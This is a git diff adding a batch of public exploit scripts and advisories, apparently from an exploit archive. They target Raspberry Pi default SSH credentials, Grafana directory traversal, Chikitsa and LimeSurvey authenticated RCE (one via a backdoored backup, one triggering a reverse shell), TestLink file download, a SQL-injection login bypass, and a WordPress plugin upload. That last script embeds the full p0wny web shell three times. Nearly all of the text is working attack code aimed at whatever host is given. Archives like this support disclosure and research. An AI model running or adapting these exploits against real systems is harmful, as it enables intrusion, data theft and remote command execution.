diff --git a/exploits/linux/remote/50576.py b/exploits/linux/remote/50576.py new file mode 100755 index 000000000..f47a061e0 --- /dev/null +++ b/exploits/linux/remote/50576.py @@ -0,0 +1,34 @@ +# Exploit Title: Raspberry Pi 5.10 - Default Credentials +# Date: 08/12/2021 +# Exploit Author: netspooky +# Vendor Homepage: https://www.raspberrypi.com/ +# Software Link: https://www.raspberrypi.com/software/operating-systems/ +# Version: Raspberry Pi OS <= 5.10 +# Tested on: Raspberry Pi OS 5.10 +# CVE : CVE-2021-38759 + +# Initial Release: https://twitter.com/netspooky/status/1468603668266209280 + +# Run: $ python3 exploit.py IP + +import paramiko + +import sys + +h=sys.argv[1] + +u="pi" + +p="raspberry" + +c=paramiko.client.SSHClient() + +c.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + +c.connect(h,username=u,password=p) + +i,o,e=c.exec_command("id") + +print(o.read()) + +c.close() \ No newline at end of file diff --git a/exploits/multiple/webapps/50581.py b/exploits/multiple/webapps/50581.py new file mode 100755 index 000000000..b90a1496e --- /dev/null +++ b/exploits/multiple/webapps/50581.py @@ -0,0 +1,104 @@ +# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read +# Date: 08/12/2021 +# Exploit Author: s1gh +# Vendor Homepage: https://grafana.com/ +# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p +# Version: V8.0.0-beta1 through V8.3.0 +# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files. +# CVE: CVE-2021-43798 +# Tested on: Debian 10 +# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import requests +import argparse +import sys +from random import choice + +plugin_list = [ + "alertlist", + "annolist", + "barchart", + "bargauge", + "candlestick", + "cloudwatch", + "dashlist", + "elasticsearch", + "gauge", + "geomap", + "gettingstarted", + "grafana-azure-monitor-datasource", + "graph", + "heatmap", + "histogram", + "influxdb", + "jaeger", + "logs", + "loki", + "mssql", + "mysql", + "news", + "nodeGraph", + "opentsdb", + "piechart", + "pluginlist", + "postgres", + "prometheus", + "stackdriver", + "stat", + "state-timeline", + "status-histor", + "table", + "table-old", + "tempo", + "testdata", + "text", + "timeseries", + "welcome", + "zipkin" +] + +def exploit(args): + s = requests.Session() + headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' } + + while True: + file_to_read = input('Read file > ') + + try: + url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read + req = requests.Request(method='GET', url=url, headers=headers) + prep = req.prepare() + prep.url = url + r = s.send(prep, verify=False, timeout=3) + + if 'Plugin file not found' in r.text: + print('[-] File not found\n') + else: + if r.status_code == 200: + print(r.text) + else: + print('[-] Something went wrong.') + return + except requests.exceptions.ConnectTimeout: + print('[-] Request timed out. Please check your host settings.\n') + return + except Exception: + pass + +def main(): + parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read") + parser.add_argument('-H',dest='host',required=True, help="Target host") + args = parser.parse_args() + + try: + exploit(args) + except KeyboardInterrupt: + return + + +if __name__ == '__main__': + main() + sys.exit(0) \ No newline at end of file diff --git a/exploits/php/webapps/50571.py b/exploits/php/webapps/50571.py new file mode 100755 index 000000000..8499c4e64 --- /dev/null +++ b/exploits/php/webapps/50571.py @@ -0,0 +1,64 @@ +# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated) +# Date: 03/12/2021 +# Exploit Author: 0z09e (https://twitter.com/0z09e) +# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/ +# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download +# Version: 2.0.2 +# Tested on: Ubuntu + +import requests +import os +import argparse + +def login(session , target , username , password): + print("[+] Attempting to login with the credential") + url = target + "/index.php/login/valid_signin" + login_data = {"username" : username , "password" : password} + session.post(url , data=login_data , verify=False) + return session + +def generate_plugin(): + print("[+] Generating a malicious plugin") + global tmp_dir + tmp_dir = os.popen("mktemp -d").read().rstrip() + open(f"{tmp_dir}/rce.php" , "w").write("") + os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read() + +def upload_plugin(session , target): + print("[+] Uploading the plugin into the server.") + url = target + "/index.php/module/upload_module/" + file = open(f"{tmp_dir}/rce.zip" , "rb").read() + session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)}) + session.get(target + "/index.php/module/activate_module/rce" , verify=False) + print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php") + print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}") + +def main(): + parser = argparse.ArgumentParser(""" + __ _ __ _ __ + _____/ /_ (_) /__(_) /__________ _ + / ___/ __ \/ / //_/ / __/ ___/ __ `/ +/ /__/ / / / / ,< / / /_(__ ) /_/ / +\___/_/ /_/_/_/|_/_/\__/____/\__,_/ + +Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution : +POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter) + req_args = parser.add_argument_group('required arguments') + req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa") + req_args.add_argument("-u" , "--username" , help="Username" , required=True) + req_args.add_argument("-p" , "--password" , help="password", required=True) + args = parser.parse_args() + + target = args.URL + if target[-1] == "/": + target = target[:-1] + username = args.username + password = args.password + + session = requests.session() + login(session , target , username , password) + generate_plugin() + upload_plugin(session , target) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/50572.py b/exploits/php/webapps/50572.py new file mode 100755 index 000000000..ad895e254 --- /dev/null +++ b/exploits/php/webapps/50572.py @@ -0,0 +1,85 @@ +# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) +# Date: 03/12/2021 +# Exploit Author: 0z09e (https://twitter.com/0z09e) +# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/ +# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download +# Version: 2.0.2 +# Tested on: Ubuntu + +import requests +import os +from zipfile import ZipFile +import argparse + + + + +def login(session , target , username , password): + print("[+] Attempting to login with the credential") + url = target + "/index.php/login/valid_signin" + login_data = {"username" : username , "password" : password} + session.post(url , data=login_data , verify=False) + return session + + +def download_backup( session , target): + print("[+] Downloading the backup (This may take some time)") + url = target + "/index.php/settings/take_backup/" + backup_req = session.get(url , verify=False) + global tmp_dir + tmp_dir = os.popen("mktemp -d").read().rstrip() + open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content) + print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip") + + +def modify_backup(): + print("[+] Modifying the backup by injecting a backdoor.") + zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r') + zf.extractall(tmp_dir) + zf.close() + open(tmp_dir + "/uploads/media/rce.php" , "w").write("") + os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read() + + +def upload_backup(session , target): + print("[+] Uploading the backup back into the server.(This may take some time)") + url = target + "/index.php/settings/restore_backup" + file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read() + session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)}) + print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php") + print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}") + + + + +def main(): + parser = argparse.ArgumentParser(""" + __ _ __ _ __ + _____/ /_ (_) /__(_) /__________ _ + / ___/ __ \/ / //_/ / __/ ___/ __ `/ +/ /__/ / / / / ,< / / /_(__ ) /_/ / +\___/_/ /_/_/_/|_/_/\__/____/\__,_/ + +Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution : +POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter) + req_args = parser.add_argument_group('required arguments') + req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa") + req_args.add_argument("-u" , "--username" , help="Username" , required=True) + req_args.add_argument("-p" , "--password" , help="password", required=True) + args = parser.parse_args() + + target = args.URL + if target[-1] == "/": + target = target[:-1] + username = args.username + password = args.password + + session = requests.session() + login(session ,target , username , password) + download_backup(session , target ) + modify_backup() + upload_backup(session , target) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/50573.py b/exploits/php/webapps/50573.py new file mode 100755 index 000000000..3da71e33b --- /dev/null +++ b/exploits/php/webapps/50573.py @@ -0,0 +1,111 @@ +# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) +# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login +# Date: 05/12/2021 +# Exploit Author: Y1LD1R1M +# Vendor Homepage: https://www.limesurvey.org/ +# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip +# Version: 5.2.x +# Tested on: Kali Linux 2021.3 +# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE + +#!/usr/bin/python +# -*- coding: utf-8 -*- + + +import requests +import sys +import warnings +from bs4 import BeautifulSoup + +warnings.filterwarnings("ignore", category=UserWarning, module='bs4') +print("_______________LimeSurvey RCE_______________") +print("") +print("") +print("Usage: python exploit.py URL username password port") +print("Example: python exploit.py http://192.26.26.128 admin password 80") +print("") +print("") +print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==") +print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==") +print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==") +print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==") +print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==") +print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==") +print("") +print("") +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +port = sys.argv[4] + +req = requests.session() +print("[+] Retrieving CSRF token...") +loginPage = req.get(url+"/index.php/admin/authentication/sa/login") +response = loginPage.text +s = BeautifulSoup(response, 'html.parser') +CSRF_token = s.findAll('input')[0].get("value") +print(CSRF_token) +print("[+] Sending Login Request...") + +login_creds = { + "user": username, + "password": password, + "authMethod": "Authdb", + "loginlang":"default", + "action":"login", + "width":"1581", + "login_submit": "login", + "YII_CSRF_TOKEN": CSRF_token +} +print("[+]Login Successful") +print("") +print("[+] Upload Plugin Request...") +print("[+] Retrieving CSRF token...") +filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS +login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds) +UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index") +response = UploadPage.text +s = BeautifulSoup(response, 'html.parser') +CSRF_token2 = s.findAll('input')[0].get("value") +print(CSRF_token2) +Upload_creds = { + "YII_CSRF_TOKEN":CSRF_token2, + "lid":"$lid", + "action": "templateupload" +} +file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds) +UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm") +response = UploadPage.text +print("[+] Plugin Uploaded Successfully") +print("") +print("[+] Install Plugin Request...") +print("[+] Retrieving CSRF token...") + +InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin") +response = InstallPage.text +s = BeautifulSoup(response, 'html.parser') +CSRF_token3 = s.findAll('input')[0].get("value") +print(CSRF_token3) +Install_creds = { + "YII_CSRF_TOKEN":CSRF_token3, + "isUpdate": "false" +} +file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds) +print("[+] Plugin Installed Successfully") +print("") +print("[+] Activate Plugin Request...") +print("[+] Retrieving CSRF token...") +ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate") +response = ActivatePage.text +s = BeautifulSoup(response, 'html.parser') +CSRF_token4 = s.findAll('input')[0].get("value") +print(CSRF_token4) +Activate_creds = { + "YII_CSRF_TOKEN":CSRF_token4, + "pluginId": "1" # CHANGE THIS +} +file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds) +print("[+] Plugin Activated Successfully") +print("") +print("[+] Reverse Shell Starting, Check Your Connection :)") +shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS \ No newline at end of file diff --git a/exploits/php/webapps/50578.txt b/exploits/php/webapps/50578.txt new file mode 100644 index 000000000..c830c6bd4 --- /dev/null +++ b/exploits/php/webapps/50578.txt @@ -0,0 +1,15 @@ +# Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated) +# Google Dork: inurl:/testlink/ +# Date: 07/12/2021 +# Exploit Author: Gonzalo Villegas (Cl34r) +# Exploit Author Homepage: https://nch.ninja +# Vendor Homepage: https://testlink.org/ +# Version:1.16 <= 1.19 +# CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + +You can download files from "/lib/attachments/attachmentdownload.php", passing directly in URL the id of file listed on database, otherwise you can iterate the id parameter (from 1) + +Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1" + +for research notes: +https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/ \ No newline at end of file diff --git a/exploits/php/webapps/50579.txt b/exploits/php/webapps/50579.txt new file mode 100644 index 000000000..58a83e6af --- /dev/null +++ b/exploits/php/webapps/50579.txt @@ -0,0 +1,34 @@ +# Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass +# Date: 2020-07-06 +# Exploit Author: Enes Özeser +# Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html +# Version: 1.0 +# Tested on: Windows & WampServer +# CVE: CVE-2020-23935 + +1- Go to following url. >> http://(HOST)/admin/login.php +2- We can login succesfully with SQL bypass method. + +-- Username = admin'# +-- Password = (Write Something) + +NOTE: Default username and password is admin:admin. + +(( HTTP Request )) + +POST /process.php HTTP/1.1 +Host: (HOST) +Connection: keep-alive +Content-Length: 51 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://(HOST)/ +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://(HOST)/index.php?q=login +Accept-Encoding: gzip, deflate, br +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl + +U_USERNAME=admin'#&U_PASS=123123&sidebarLogin= \ No newline at end of file diff --git a/exploits/php/webapps/50580.py b/exploits/php/webapps/50580.py new file mode 100755 index 000000000..2f79b82e3 --- /dev/null +++ b/exploits/php/webapps/50580.py @@ -0,0 +1,109 @@ +# Exploit Title: Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) +# Date 07.12.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://wordpress.org/plugins/catch-themes-demo-import/ +# Software Link: https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip +# Version: <= 1.6.1 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-39352 +# CWE: CWE-434 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39352/README.md + + +''' +Description: +The Catch Themes Demo Import WordPress plugin is vulnerable to arbitrary file uploads via the import functionality +found in the ~/inc/CatchThemesDemoImport.php file, in versions up to 1.7, +due to insufficient file type validation. This makes it possible for an attacker with administrative privileges to upload +malicious files that can be used to achieve remote code execution. +''' + +# Banner: +banner = """ + ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ +||C |||V |||E |||- |||2 |||0 |||2 |||1 |||- |||3 |||9 |||3 |||5 |||2 || +||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| +|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| + + [+] Catch Themes Demo Import RCE (Authenticated) + [@] Developed by Ron Jost (Hacker5preme) + +""" +print(banner) + + +import argparse +import requests +from datetime import datetime + +# User-Input: +my_parser = argparse.ArgumentParser(description='Wordpress Plugin Catch Themes Demo Import - RCE (Authenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +print('') +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print('') + +# Authentication: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' +check = session.get(auth_url) +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} +auth = session.post(auth_url, headers=header, data=body) + +# Get Security nonce value: +check = session.get('http://' + target_ip + ':' + target_port + wp_path+ 'wp-admin/themes.php?page=catch-themes-demo-import').text +nonce = check[check.find('ajax_nonce"') + 13:] +wp_nonce = nonce[:nonce.find('"')] +print(wp_nonce) + +# Exploit: +exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' + +# Header (Exploit): +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0", + "Accept": "*/*", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + 'Referer': 'http://' + target_ip + '/wordpress/wp-admin/themes.php?page=catch-themes-demo-import', + "X-Requested-With": "XMLHttpRequest", + "Content-Type": "multipart/form-data; boundary=---------------------------121585879226594965303252407916", + "Origin": "http://" + target_ip, + "Connection": "close" +} + +# Exploit Payload (Using p0wny shell: https://github.com/flozz/p0wny-shell): +shell_payload = "-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nctdi_import_demo_data\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n" + wp_nonce + "\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"selected\"\r\n\r\nundefined\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"content_file\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n 
\n                
\n        ___                         ____      _          _ _        _  _   \n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  \n|_|                         |___/  \\____/                                  \n                
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"widget_file\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n 
\n                
\n        ___                         ____      _          _ _        _  _   \n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  \n|_|                         |___/  \\____/                                  \n                
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"customizer_file\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n 
\n                
\n        ___                         ____      _          _ _        _  _   \n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  \n|_|                         |___/  \\____/                                  \n                
\n
\n
\n \n
\n \n
\n
\n
